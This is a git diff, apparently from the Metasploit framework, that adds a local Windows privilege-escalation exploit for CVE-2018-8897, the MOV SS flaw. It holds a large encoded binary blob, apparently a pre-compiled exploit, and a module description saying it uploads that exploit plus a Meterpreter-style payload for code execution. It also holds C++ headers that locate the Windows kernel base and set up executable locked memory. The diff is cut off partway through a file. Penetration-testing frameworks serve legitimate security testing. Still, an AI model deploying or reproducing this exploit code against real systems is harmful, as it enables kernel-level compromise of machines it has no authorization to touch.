zWx~~sFLaIm_#3z#BX&*A7JuH7{4)#k3JT6UHxHknx~B1*rPr*(&rvw=K0I_$q}JRD
zpuU3g#5zsR6p^Mja<7B93SoPnNXbw9j1k`fM_8M~EpeQwhBL=0*Y`3MzSU)tABIx8
z8*z*&ggZS?36s1`EN49>f2VP>LbR<F;eoU`&iGP(!V%sJ_gLjiUM6p6`I5iWI9UK`
zTu-9?X>pwKMF-r7V~hvxBh^9TNS>z0ob`}$oW{vok){pd__mod$|$$gquUYQ5BCSv
zL-HJ}9#W3eI9U(USl`c(Z>2e-jB-mz0pb|rak#}#@-W8Pe#zHqoJ@3F^cmkEb4Ib<
zPM-mZhd6l0_hIpjhm=0x2p^XCW9YZ!WpZ)WQ}Q3nh;QZ7sjx`a*zL@DDiz0>kMv)}
z5f(sRJ>dBcKWBVrF6}652=QCTh$~?xuCpByf0RKyQ)6em*0gxeRMJLiPi9&i$=4ZA
zA)e%eZw!tqQb>CH3XV{Z$}!p|=|yhJu~s-skh~;aVvKS>NVbxt$fDnoZV>r=SQ<%p
zB$F{|oSL*`T)vI#fLRk%*3wLswQf>GyC<ovC6gjEawn<W+H5sz=~Oi-Ixf<O!@a<F
zGwl1>x))`r!K0P!o-s?8^edqBR|a0Fnz>{`WPCO9o{*s?tUw=}n5|BXPgN(@W~mb^
zrl=E9-ib?&8_pR#rZ*#dg34Z!8JS!?DL)r4_neh+KuzkO;9ZCxCJQIxev^T0HSl(q
z>VIvY>Z^T3?Tvp$Wj?uIO<3Bknsb!;GVDu``&?9GG{-8Bc<Qitle9nbIXo;I8-p&T
zP?num;-Jj*co}%f;;dTOiph}ABsFV^E0QsNlA2ySSxpC@zGNzSCOG`S=T01_CRR*R
z`KROF8Q28&A5v#0&z(C_<!qQWI5RS%+LaG=g3JpkbCI$c4@S2PN|+eYLGfFLy^QFM
zSmWn~Um>_Lz39UNkV4}D9KSfjem<uc^^>v|$xS>k<v`(*M$B_Sas3P^W&A7sXCS?l
zmkWJ|4tY)ebEl41Q&&v(PI9!#){R?J<5Tj>wI->V@#$*j(xcSON2c03PznDTxmhYV
z4qH1#<wAFIm&_hMdT>VXFdn&-bbmS<^Z7Y=cRk7%Gb4Ar%3U!#G7IIII92B=^+njr
z87ITeb1L#gzR*cK-*vNxXPl6wPN<!(PCy+_h~^9*GdQb%X0Iz^@_8IDX89>@WZKGn
zrr6_WiamZzoNC<Q^e${W;s}b7nq|zC_PNkLv=Qygn3<_&qU@Py)66AD4Q5BCR_C5P
zUd_n(ni}WD{ZSYL?HB`7axlL=GArNYe=ZK(*Ta4X`3u@(IXcdpF(+Hi!8n_PHqAl4
zbCB<xCAq`L4$kh)I3`OSQ<1HX!FWDq$;@Hb;8DF&p4QuJ=;>57Jqo>@1$~AdC-r(t
zhMKYgW!O58u!@NY!#JG@otN>Au-wHM)A4U%e18*T`y1*+)ZgW(f5sftXQ@lgS!dU!
z|LEQs5m)teubyx4g_0=do)fYm_ZjMh3fEz>*YPHEUP6DphJJJE1Nu#5Bf5C~<@kUm
z9=)BAuXW)VxX*BK&U@aBoGg_CIpsi3IgnG%l3Bwu2hk?G9;idb;X0sY1vxFv(z3$Z
zJY~tm{M`Jh>ZGL`)kzuGDAzFhu|KQVp3x|S0aPp_2W4Q+$ibYEgE<1_MT}m|kU1H1
zvFYD8aj~)#zlh9X8)mpBDOY^5av_~-N%o+L_gCBvJO?)@pTl@sPWT#)$W!LwsGf&&
z^QNlfYcEsBS9sO&OV_I7GcHlOwOYptQ9rH6dhR#*&%v$XUf62nFF1wsxe3p}s~{%A
zilhb8!(T<3*I^}GaK^D&>R61eV==alU3c{GjKS&s(|V^S$JPK|GE#+m|C&v^?Xji%
z-ITegS*bf<A2w~)>zUV{BaWaKQvUC@A<eC+bh-0oJj}p&aH(UWsqr9VPUgkjGbXF!
z;*YB1mVQMYm(i`JvM(bTk2CO6?xQiUAH8I{U3byDS$ARnf&Dt`RSx&vu>GUjl9I2a
z`TE^TeHYfG`8nKwgH5KfrYY;mlav)d5%;CdQP$EEl!X_#>QSWUHpwURUZpO8eS>9{
z!2OF)ruZnmT_<B))~_s#<tZ4;aIb^j<3;AvmQGRAFmLA`Jw+XzF;is^XANfdPwLfL
zlq&De9ZKzkop5G`jlxgeiEkH!i^-TgUQJ#x-a9TIay&UxoxJYE;S&ar>(A*uCNjHP
z&tp>WPjo7E;x2rnXGw;QYr#vwJHhRI=1x^}m!72NW*npJ8NYve@3csEwe&@X=u*W@
z=#onv`+%)WcG#5JnQC?%7IWBajF;I<W+cbUvkzme;6+f9yN$92EIn4`{$zCSQ>JC8
zX)97|NA72EKPv1N)N3J7&k>lfDyCwt!g{eJwNB`H<tU8vX&C3(DkqBd9P7svd%elV
zdV{$OX>u`VVGZjydi^TubyJ6~+crUaE}wz99P=jTqB$5da~{w=pL_fym7Os|O^i&a
z7AcF)M$jf*ubHS9=26Jyga;h;vdf=l@9A<;Z@UiB*@L+`6V;SgO-_0~s77A7b0(>y
z{xo^ege1$5a^_A!pPcCIlYHru+y!VC>NRb6>fn_A$-Q>k{Bia=-YDrz-(U_jeUm#I
zbKe8H4IYUj`zWka$@R#t_YBnAg>`y5>V1^TePs4v#^iBoa>f_+x+>{l?RgY?TO-rW
zKU8WP>~lt+Wc_{ZXsp3A)Xbku^)h~P{(0y*oNK_E_%rN1-4xUX`#6jnlkY2t<9!};
z8uQirld=0&^!&je;k!?;?=yZ7?!Uk;I7@1cy2~6E#eVtNOw5l{pw~dmFUKx9I+8IP
zI*hi@M!RP}G9!{9YeDTatOeQ1^+0w+?_;ok!P=4wx#mLWu|FEL*Jc!+dm`%oz|`R>
zgX|CLOH$TYbEiXBrvGGWBsXtb=}GaKSSx1O<Lc<*qaMf_&K$&kyw~hUBpu?NeNx<o
zczP~B`mCd(>G3f1ZDXzha`7R7X-j9RX@8m&5nU2}$i>G8rv6FKE=j+WCSm_W-KOr?
zx-I+XrPz1M8gw#bc2c%F3FV(uaTL~GxYr#&oI7}I|Lk7KY?jP#E;S4KG7EB>^@!P@
zPe)siQqvznTjyn+eau-iUL8wUt5LU%qsFPDmSo}j$llB5Yq`%*u16rr$Rw|=Z__6r
zKfS*<x^c!|l{y=?kbOI22HJ!1K4ZzW!Ksm~Y7_4(i1Tl-VG~cr2KHc>uZE`&%Bq-(
z`-OL)ldzSHn|sbwHGgSr{QQi-__6jI`Nv}{d_aCt$Z!v=$xk}Umg`LETgWm#8?v1R
zxz1E4J(8S5lKb)8(`DW}QJsL7nU7U|8}id}<|0ncm~pzLOuL_Ojfwea7GyLlYWgWP
z=8h!4GZtj1wXjBhcK^gvdnCL4@lor*u#x?@+!^Xc*gMVmv*#GhEwz|iFmLBVpK>3-
z7_#?>jy>B<J(r8T#B9yenD~Vr$C~N?GVXifKa>{cg1?+Wijiw7!5r8(7m91Nk@F@o
z&Ug!D0Hzr^QxxNjx0H2rM!lDQl>>*@SFYO{;qQV?ud~TR&J4vk%W-``IlV_HXYfPH
zku$;caw^9tCyupPjQgJsZ;#|q2>-F#B4=u1obB*3FY#}6<X84G@-93)e~Bli;3XYa
zM%+lek$5-pLE?VmW5faC>%?(V9?UVsdBkPJtBBVTZzSGLY$F~d_7Z<ie3SSdapo(!
zym`cnh-JiT;#Oh{aXWE8@k!!K#9`uuU+MfU;zh(Y#4W^|i4PEW6CWY=5}zjy5Pwg6
zkC-*c@`y`_CB!wvtB4zkQDO`63&aHRJH!FvTg1#?>+((}E+bw-tR`+Dwh-Hi2Z_DJ
ze&XxI5#r2ObvdUJ&mnq<*APR*twdXy@ULKE`fsyJ{eA-c@JnqBzs^<QhoYi5er(&&
zfTzBSQn7K@fqf^1dU_o011OKz>RTzWOBXKp6%^Ih%1`P_?VWgqewfI<g#l+=<IBRn
z+OpsVJOa^Fq|{eU3dCNIAE)rc9x6~CywR`JL6cT)4pV1H`MhT#J?3?i%WC^>K3x^$
z{LkX2@BCO*tIkc;zG&k{d4Q#9wJ)|={Z8pyPjp13E-hWRrnKy=CHm*V`5C44^7E}X
z9K?MoQT4ujQ_{h&kTT@iic)>+;`)qIJosX6tO%vos#G4(I9?S+<@O_gQ6v~ET2sDC
zy)b??o(c=f@ADPm^}$*{e(H{@Ursd6if}SqJ)eOR@tg=Ab%7M?{YC0)6V}B;-kOTA
z<mvJIYEjSP3F~~pn7_2K2A|55pF-86600m6-rNvbiJxM{v$Q^rk8rAQO33B)H{cNu
z++KCv_*J-z1V1fr@<-*a2t4_vBJg9I!qJs}`T8erJkepx#-qr{%BUaxRb;z$-<<}@
zL1M-7^ERH8;@yEt?HXU^$6X4C`A^Cyu^%o>4>%yTEA~aCOx{4Cz9oKCD_wES&l4}N
z4?rfkkulk72t+zfd8O}<7@Q-ajy}9>Jnxc$4yM(nsJ^y5609!{H$W;?6U#$>eBE@q
z^m5u=YxNT={L#8#J#O_e%AlGjR)k_41-FVD$*%B)@Qv2ngrO3eZ4+h-^!t)C?pDLY
zcoDgSbG@od*C^=IKTni<2yBf~!Bn_t!y5eJix^$bF=y*w19}vt1#62%nQ_~t>Jq&w
zD)uUMpX9N&bhWs@VQZUL3ReYo@9GB3k~nO0a)_zD;>-4mR^ZBAe55AwB$WyX)1%bX
z4&yX`f_?X{*B`~BWKioG^fTm(j&nImVYV2_FN?3fgQ+4|=P!!c`NO3aNl0luo?Z;s
z%Oi{B_I&~|NML7%2z0EVTU0R~!1Qwh`^LoezF>T1I9iT*DCE~qMya#xd@-<XY3UpC
zaGJuIgEd1-&Xagjo8+V!v!%V<mfSkOmffe7Jm%$#`gQeCyU&j=D_-r3B>CUQuWg7&
z8shdiO!_`+x7%)#NE7Mak-6H@s4INYpxnw^q}no8h8ki4smqFnjkse3Gx4i>=CEgW
z>D#v*9G!ykJ5@%4q~UZYcUvwJKgSIJmew||5bM<wl!7EfmHyZKe;|SBC;!@W*9&EL
zefJ&DnY|^`Pww^LVB-IwX~4x|40g$mU*&xszcW2|t@V?QFW`4X)WP1vU#ahd@esYl
zN}|L&hH)jnT*nAbfR*d2iLldP@vEQx{q4!XY}icV6k--o!luHSFv(Za3QmWWd|j~O
zC*LQ)<+5$Xe=e-}pA9P<Q-sZn$uS7+H0$VJPLy#Z`CkbuWrtuTpE_6z789#F0TxS}
zU4LnZ#BYX`I&UN13Y50o1}ovW!%9B)!=46<qfeW60HuC7YPHMTL;tS>rA;{2vcrD?
zl=|dAC?YQ-v%-_c6=r}NV|a$sQ-t&(M(W^9@*&afI!T)UHUBGt|CPYsFM$Z>%|_yp
z#$o!{Oy}t}NDoiv|K9lj-t_<3`KQ+>ou`-oKb4y^HPe3YFZJo!KMGC0e?Pj8Xmp;|
z5zXIU=6~aqM}8hySNh1$qy9H;)IXwXM^qE;ZjPuX)<2^3|N1=s|5A*Mar#Tlowz`#
zzP0JrxfJm3Uuj3jE{)s1H2AK#3U6+<F@gBs-TC59O9vnJf7^T7tC0BBj~Ks*@xO-n
zKicuyj^osCcMR>g`pEg;++nA<3>P$)z4);gEmig6buTVCJpNAyUK#ugp2xmf*Ua^f
zzJ4<EvY?n|xp??bFzI`AStpAf<+!fX^_fM?A)Y|Ai1UbU;zHt5Vj<B(tR&VFBgC!5
zX5#I{7UI3cR^oPI8}UJ6JF%0PAa)abh))uqC7S$SAb*MY8gZDYHfy<L5_5?2h;Cv&
zv5;6vH2aYNd4$+VY$mo4TZwJNc49ZNm)K7nBC3$Cr;F$&<`WBug+ve0OROYT69dEu
zv60wJY$3K0yNSI-lYc+?AaR(e>U4c`h;Cvbv4VIFF+gl4CWyVn){N2Dzees375_-i
zN8i)+I#T5Ss&Hw~2eoN%!szy!`bQ41J&$N?{))!l4{4`KpN{WgjuOB4q0w^U?dGbN
z-}#!ugin$mN8U${TOn-oEcr>~FOVNi{u23I^4G|ZB7c)y&Q!#_O)lp`V%{Y;M;{Y*
z=z7cflbCGs6E#({$mI-4Ob)qaGo1O5%ejjfi(JlR#JI_4YpU|e<*Z0d0eP;bs*qgH
zc*J<f<%~?sz<OO@IXe>LW%#k0s!H;c$*ajvA+IH$M;;)bPaYyamAsLByYVpo6SaN~
z%=yRQEi_x1?@P@0-;0Y-Ke0ytjlM_I^iwxu_!f;L_FDV?`~OUCv_mz^0cFO!@4qkS
zh0>>mu<v6p&<xy$RMIbU4r#$MF<cJQKCUpy`X;8_f6Yv~3m?o*y1n0<o^;Q9d!}(W
zf41!y<F+3APOf%Oc>I~;Ke<%g9e;fG`QxAX>6$`o_~EZc&PW{i{zJjS{%ij>|F_3|
za&7J(ZY#Y0v%mOE@lg}+JMGZJg@1Xxz2uMEW`1hht=}koeA&--|LFZyCpA9t)57pm
zgZIAC{LIDQ{B)w|u{$<jzTmw3{w*@Nb;V;ZfAW>TJoL^VZtl9Qxa0LLzj^jgr!BsH
z+o>gP*RfqA2VKAU{*!+#`NN(U{`_x$`1K_>e&$D|{%4=Q|ES#u+jD=jbLBMuvDppV
z?rhldjAwP_ir4mh`n(Iy?s?>o<*WDn_Sy@-f9(bLJp8~_?_axnxWnqL*mdu@z90YX
zo~!N|n1AhEfBEI6uFs78dBNj5`mTMsxxVa~FMiItd)&I}C+9byz3RDVpL<rDca~p&
zVb(8pM&#ef@~dhu_|@9`K36~Uwtrpzy`L`h=e}Bb?AL$%FU$L<pK|-f$6vhv`+MG6
zUby>f!O)?J-#+)wKP*4%!pBzJ_}iatfBfgaTmHn~{`S1@_8B)kyYIE-i_5P5_39_T
zv;8x#KePOSC(AErD0yzycfN3F`74{gx&6G-11Em@N86XrJLRcYAN%G7XZr5Bak=mE
zE5Cd5m&>=#{8rWSU%a*WzDeJC;Evhvlq{dOeAgT2?OO2rTN0-)ziEHRYme1#UD^Ng
z<rmd_eA2V0RNQde`}c3V@czG^pL=7?{Ngiv_b;1!*N+Qsz4&uI>Tkce;H8$z%;Ud2
z^qV_(kH6rl+e=qW{@Ujo&i&=0^Uu2egrA)9%O!8EYQ5^b-JkeQ@A?;a-MV|nSC_mR
zcx1+&bzdsE^6RdJ^H;r=ch1ta<p-bNJpWTyPU!4?<%yf#8G7o(hkw^{)%yFFJ?_2j
z<eW8^`ZxUTwoe_JwEd<TujRe+rRRUrH{s>o1NM$n=5;Y5>y#P3#p3)kbcLRWx`{*d
zH*ps&FS=rbueQo3Z%HV`yK@T*?Vz#ZB_Ejnka&2_b+D$&e$!Ag=2-cK{PmmSfzc7i
ziWhE(SA{oLMSb;~{3gS(;>jy%tK@}5Xv0|H($4fYj1{kH6<?yHtA<y5$Niha(I!*2
z2x!c7`j^!YNHumkTT)||GIso`i}lN&KCmFW7ytL)he^PNCB%nC{82pf)((6Mwh-<?
z;IY_Dc;NN|AA$A4-4C3DO^*2I10R4D|90T7V6TB&p5^;1HdX<+6*d%4z)GI|z&~O`
z&<^)7a1%BI`{9lN8?Zq2!|i<LPM*bk6&t8w_zS)Vn}g@v1mD8O!40?I>DV+B!Y%ka
zY#6SAyB!;a_h6-5d2#e<u;R`Kz6C4w90nfm#&27QZvofghpjfatAS^nuH!hLr<3RG
zz6#reID+4TeHLzczU{kb;JHD#<-W^ldAcmQm+?%x<^IXb>6UvBo9NySd=6IX(+_-~
zZrL0Z!}j4hyAt4ybZ-SdLU%v#pJDqEM_!8UUy6Mf+yUU-XQMuF-wXT^tSx`wi|1gk
z3ICUXe})zLXP=8_Mquat5YK`FUxgL_H-T9Ni~}r%m3n%Bp7UT4U+^wi$^Ty94!S#m
zKcM?f;H~HDIIX~6()|)}*#%nuf(@{ee=AVl&s~lDmjWMxec`9*Q=qjR_v^r4unbnp
z75o^itxLe1Li7>h2)+#a7~F%vy+zo^KAWNT0|!=MPYkzUs2Kf-ID*qk;Ql%8TLt=H
z--drJa1X4Ml>kmE)%DB-&ViM3E#TR77XYt=mG~jxC+Kbg?xedD`2CgG{~>>Qu5s<f
z7)PkjAaI&Tr<Hqiub?{s+z%`A5&SLPL%<cQAS<LT0d9tsa+`tA(ETj%p-b@FFXFTV
zOUiI>uEYnPvs$U`a2Eo1!It!+jlid1?}dLKaQqtG#tFc?yqGKCe=jiiGRO+<6M$1H
zAXB)rfi<vi!(9u!9aiKc_!C&E{|msk>0ffWQY)`e7zEHI;O}8&4893GZ9VGzGdv>$
zTm>unlmQRHN*lX@Z_xiu;O0vFp8f)44t$;NAz<)I`UB;jZ4b&4{PES08{97dw_c<3
z>;b+9D`lx`@%#qtR>XM}SoSepf5EM=cDsOYz)F4I1kS0_?pEN_u=gTuAMkV4&`aFA
z-3Clt2bsfP@GV$LI}9w^484Va32*>b>iITsRY;c=0saEEAN~Wtk~)kFi4WWgE3y@Q
zly1Qhx&?2k*JG_2cwrcQfV73c4p@=-W5ClQ7#Gh&=D>$w-Eh0E$MayY(%xmj7FemX
z;H?eXy&d=!x*r9;K)2wrTXb3v@av6u7E$tSf_Pyo;cf*!11t4^7WgLYgYXxedL!Bf
zcQ)`eSgFH8U=^&?p$+)Mtr+8o^8)Z)ScxOpbd#PpwgR(m)@{!Q{_z&9O+SLnfnCig
z4{7%Uhi^q6i9hh+J0O3!+kscyspV4%Y=xEl1^3XM0LEK%{(^h%f*WZQz-M8lo`P%c
z)@}3xXWoOpMx0r|Ps2)_?cxV3`3nxvEjaO0s3+oQ0^fmMigEfb@O$^`dF)BxzdoSH
zulh9dgOz*)--NA1e8Iu(m;--;c?P)VGk6^R$5`Ki*TYI3ZU=rFR{EkBxb3sJZbY2h
zfdyYgUdTuAp@%RY;NK3s;bF8F?gxSEzJxg%?h4?}4zvgEPT-!MC`;xR;5)E(9|1qP
z3-9-Ue=G3OJ=hx{zTmGDdd$8CoVr)X&jy|iEA=b^-U2K2Yyr;d(()H9fR%Mq@N2L#
zkM#fp2O%r8UC`H!y(P-31z!DS+}{KLYk=Q=M9Zfac>h;0C&Pa`u<uc%hr1uR@vB;|
zBEW7~*$edm&;6SAF9RNcm3sCA|JsA=aHM?~*!T_YFX(y<b%wv-)4kAn$sc&%clDgp
z2E6PE?XCb$`5yEfak7Dr!uG>0xcf=;E8Gd-8?aLD+rU46A36>Hw}DSTrFFOuxaMi?
z_5yzoD>77lSpQ)&vCifLJ+Lmgy}-+0XTe<!^ugx9Jq*0_2U_L}e~38*_5}EM0w+DI
z^UMTZ^&HlC_-_S%54H^MCxM~oVc{0+ft5N7p7|qPw?g2l{g@{a#|>NqD>~x^9-_M&
z_-9zz8@vrX@5kD`4EXd<u>XO7A8_3ZkOSNmzyPf1gW#WFWxaSCc-zku5<|~{UxT&B
zAn@X!YyWOwFRUAJaQmjZ16JzX0{k=Gt^t$@EB=COe~CL(5&s&X=M~5VZoyYz%itaa
zUNHz6!d(e`0k#0^o#5(U>wa$r_QG}}P9Jc^tGbOPz?R=AyfguI0G7X|WnKY1<+qr3
z5Pu%<53oIOzYYBE>sSxqeiHcc-$7^Kz8yH}4ZY{d1U>*Od2R<@{72{m+#aCkE$D~1
zfd~Et9PV!5d4JM%UItwGXUJFL03U^wwOjDuziIz&;5{Q41MqJLZu$$_0CxcRDy-<?
zYrsqXiavsW8Ss>M&~~`z0VlqTIT7wm;9th$xjpRD-Ua>|&z`yAehqlTM63x|%Nl_{
zgq6M+1TLBc86!?U@b#(CWw?ic56{r<c3{SFkO%xH0AHGi@dWq0`57t(EBX)zu09oW
zIsCoAUf4mn1#eq`F#-4Oz>D1IbHpzM-T*6gXau@WLp`wv5d0>r><1nL=AW+fzXo{V
z4CpERdw??*;@SwhItzHtB8(OI7XT|^r9Oh6hLyQa-lZY$+vtQ_P~KhfDBObbjtbY0
zG|GD>#4RZAlMuI{y!%1ig7U6|StwUf-WgDceS)C87eL|&meVcI^2_t};x8!A(TiJ9
zo<kS6pge;vZb5mjT-<{4%(u7&<#}&$3(B+6o&6f+d2aC+lxMlcEhx{`id#^gofWsB
zJQpi&L3t)t+=B89rMLy<Sw(RR$}@lB7L;fB#4Y$Gx-laDhZyK2S_<1dy1^J5@W>y-
zf64^R1qiDy9H(xQNNHx-^2WLlK28&j;i-`e7o52$e}RRUkA`b;ll+AXF0WXbSFpgs
z8#C)`eW7r@|H1`L{@8-$7fs7rhA*V}>o$a%EM!n0yKn)%&~tta@5!w5#q#hWnP@l`
z-WboT3D=$Pi`6aKa^?cOOS3+>5$`U%!dV)!vaDtJ*itMmk0LO)lRqT4vre|tA!W>8
z(;#ntC5KPce|-Z=@z>%}rY*R2eUm?y40HyUHX^A!EK}y+f)|G4wXgorg$sOmk?Iz_
zay7cZY6uq9$g90CT(Hp>iuo5<i<9{*TYThFmMtDtr)7(ijYINfi;dhs()wadT8Oy}
z{novsXGiajfgOXmYhZZC$PU-eoSoLrmYr=o6FYl$_U#<lIka<RXJ%(kr@OPD)6-em
z8R%^6Z0T(4Omy~i_H_<)4t0)nX70+_<=$1W%d@L;S72A;u9jVGyAr#4cJ=KV*fq3k
zWLM_yoZar-1-m`FD|ZKWH|}oP-L^ZiyJvUb?t$GyyGM3s?#bEX-czv0v!`-TU{B+o
zmOX8I5_@{~^z9kgGqh)9Pi7(~QIPN?DieW3W1=O|mPjOe5`Bq*#86@+k-0Z#uX}I7
zUeDgjy@9=rdt3Il?M>|M+1s~wVDHf0k-eE+IbH6qf-X;2Wmll9v8$!4tt-*h)795C
z&^6RG(v`U{XP<jt!9LHv%6)--jr&^mwe3sn>)F@0Z(!fhzL9;I`*ZfY_ZRH<?62G(
z*x$InWq;fL#QvWBeftOY5A7e>pLqZhhA`Uz5wxxu?Q2B~+tJ2uw6YiN>_<xn(bi$K
zR_)2$<3fuqv^gKGE=0S%Xn8eS-i)@lqV?@)e>WsBDD6+Ey_tJmd-Kso_kn@~o&%K!
z0tXrov>a$VkT}qDpzpxIfuRE<2Qm-l9CRNnIOsW8c`$IW@nFkARHzzzW<V=s)()xl
zLMr``OV7c+g98VL4vrkmJd|_DeW>7&=TPOLz@f%NEr;3;B@Xo*>N_-WXz0+$A!!uW
z-f`FywCA+D+Y8z~?Un6;_Qv*>_O|v!drx~``#}3p`$&6cM^1;kqoBjnQP~mbXzXa|
zXzNIH^mO!f40H^2jC5q~$l2lEQLw|aqjE=JN8^r`9c?=j(7!(D-w<>!6T0W#S+LWy
zvvOx(XXAfMEp-34)x+Wa>VWHjbs+yh;Q{Y~>I0Dj%?DZ!v>)g`(0ic&z~F)51L~mb
zpmi|+VBtaU!RmvNgUtt954IodKG=J(|KQ-k;e+as>yULQ|4`u}@1g2LkweXgS`W1!
z>ORzasQ=L5q2WWS8T%5M>)T!JR(pPXVY|1zx;@g~+}_&W-rn8b+uq+k*go8@I$RxA
zM}9|Phqt4;Bht~_(c018(cRJ8(cdxHG2EecxOP}O@^=*O@b0MI5!unaqjg97j&96D
z{g{V_cc`5%%t84(3wL^VR_~1LY~I<rvwdgx&fcB<I|p|T?^K<xPOCG&v#`_KS=|}w
zZ0>CBZ13#u?CtFD9PAwKRJ&ZetX=uL3U_&TRqu-IYTnhlt9@7ZuHIe!y9Rd+?^3&6
zyRF^%y9;-FcUSL@V7#_staf9Z_G63=V|=<WHuEtqy%>`bjLBAv$L>A7d-^dRhxe$2
zD`6$_6NL$HqB;>tG$&dywz?C&iT=c3Vi=><wb#OEE!^wfTfH~3w|Q^t-uAuSdwVhR
z2KNr{Rb8$wt1G{&u*=(3-4*F-?rQC7@9OUA?dtCu>>BP;`&|31eIjS<n`G=_oU~)4
z=()NNQcBI&YG)>-C3ChL5-WhrJdj!?<Q9PB8X>zDNUsg@OF)7>kYOLBH~={gL6Reo
zWhSJV19`e3(E`ZS1F2R*t^r845wdN8blV``1SH%88TUcT1Ca9&Bs~IIXF}RJkhdEW
zFM!NFka{KL9)RQ<A^R3czYX$7Lwa!y3mEFazhUef1u$=@j?9i`=s+RXhi=U4y_nhi
zF}Dw5b|1$4o(~P}gN_bBONXGRBhb`L=xPqM)eU_ufW~^Dvz5@=0Q9yIn%e^1ZG-kE
zpuauP;6CW^0JL}rdTh^W3KN>G%bB(|yP?ko&}a{Ix)NF)fL=F3vs<9sZP4xn^t%Td
z-Ul5YfR+zI&vngRnDs2od-<683NiP2G5b|x{)=D+Y{uL-gn7@6Ij=d{i^KncnQkn(
br%PSS+{iBndKiEP_F&dmSOp`{HKqP9Kc<{1

literal 0
HcmV?d00001

diff --git a/documentation/modules/exploit/windows/local/mov_ss.md b/documentation/modules/exploit/windows/local/mov_ss.md
new file mode 100644
index 0000000000..de273af1c1
--- /dev/null
+++ b/documentation/modules/exploit/windows/local/mov_ss.md
@@ -0,0 +1,10 @@
+# Description
+
+This module exploits a MOV SS vulnerability that is specifically made against Microsoft Windows
+(excpet for Windows XP). It will upload a pre-compiled exploit onto the target machine, followed
+by the final payload (such as a Meterpreter) in order to gain remote code execution.
+
+# Vulnerable Target
+
+Please note that this module may not work with certain hypervisors (such as VMWare). You should
+test it on a real machine if possible.
\ No newline at end of file
diff --git a/external/source/exploits/cve-2018-8897-exe/Error.h b/external/source/exploits/cve-2018-8897-exe/Error.h
new file mode 100644
index 0000000000..29607d3ad5
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/Error.h
@@ -0,0 +1,10 @@
+#pragma once
+
+#define ERROR( msg ) \
+{SetConsoleTextAttribute( GetStdHandle( STD_OUTPUT_HANDLE ), 12 ); \
+printf( "\n[[[[[[        " msg "        ]]]]]]\n\n" ); \
+system( "pause" ); \
+exit( 0 );}
+
+
+#define assert( cond ) if( !(cond) ) ERROR( "Assert Failed: " #cond  )
\ No newline at end of file
diff --git a/external/source/exploits/cve-2018-8897-exe/KernelRoutines.h b/external/source/exploits/cve-2018-8897-exe/KernelRoutines.h
new file mode 100644
index 0000000000..704a9289c0
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/KernelRoutines.h
@@ -0,0 +1,66 @@
+#pragma once
+#include <Windows.h>
+#include <inttypes.h>
+#include <iostream>
+#include <vector>
+#include "NtDefines.h"
+
+struct KernelContext
+{
+	HMODULE NtLib;
+	uint64_t NtBase;
+
+	template<typename T = fnFreeCall>
+	T GetProcAddress( const char* Proc )
+	{
+		FARPROC LocProc = ::GetProcAddress( this->NtLib, Proc );
+
+		if ( !LocProc )
+			return ( T ) ( nullptr );
+
+		uint32_t Delta = ( uintptr_t ) ( LocProc ) -( uintptr_t ) ( this->NtLib );
+
+		return ( T ) ( this->NtBase + Delta );
+	}
+};
+
+static KernelContext* Kr_InitContext()
+{
+	KernelContext* Kc = new KernelContext;
+
+	std::vector<BYTE> Buffer( 1024 * 1024 );
+
+	ULONG ReqSize = 0;
+
+	do
+	{
+		if ( !NtQuerySystemInformation( SystemModuleInformation, Buffer.data(), Buffer.size(), &ReqSize ) )
+			break;
+
+		Buffer.resize( ReqSize * 2 );
+	}
+	while ( ReqSize > Buffer.size() );
+
+	SYSTEM_MODULE_INFORMATION* ModuleInfo = ( SYSTEM_MODULE_INFORMATION* ) Buffer.data();
+
+	char* KernelFileName = ( char* ) ModuleInfo->Module[ 0 ].FullPathName + ModuleInfo->Module[ 0 ].OffsetToFileName;
+
+	Kc->NtBase = ( uint64_t ) ModuleInfo->Module[ 0 ].ImageBase;
+	Kc->NtLib = LoadLibraryA( KernelFileName );
+
+	if ( !Kc->NtBase || !Kc->NtLib )
+	{
+		delete Kc;
+		printf( "[+] Failed to get kernel module information!\n" );
+		return 0;
+	}
+
+	printf( "[+] Kernel: %s @ %16llx\n", KernelFileName, Kc->NtBase );
+
+	return Kc;
+}
+
+static void Kr_FreeContext( KernelContext* Ctx )
+{
+	delete Ctx;
+}
\ No newline at end of file
diff --git a/external/source/exploits/cve-2018-8897-exe/LICENSE b/external/source/exploits/cve-2018-8897-exe/LICENSE
new file mode 100644
index 0000000000..e550541540
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/LICENSE
@@ -0,0 +1,29 @@
+BSD 3-Clause License
+
+Copyright (c) 2018, Can Bölük
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of the copyright holder nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/external/source/exploits/cve-2018-8897-exe/LockedMemory.h b/external/source/exploits/cve-2018-8897-exe/LockedMemory.h
new file mode 100644
index 0000000000..d9b8c440a8
--- /dev/null
+++ b/external/source/exploits/cve-2018-8897-exe/LockedMemory.h
@@ -0,0 +1,88 @@
+#pragma once
+#include <Windows.h>
+#include <iostream>
+#include "NtDefines.h"
+
+#pragma section(".LDATA", read, write)
+#pragma section(".LTEXT", read, write, execute)
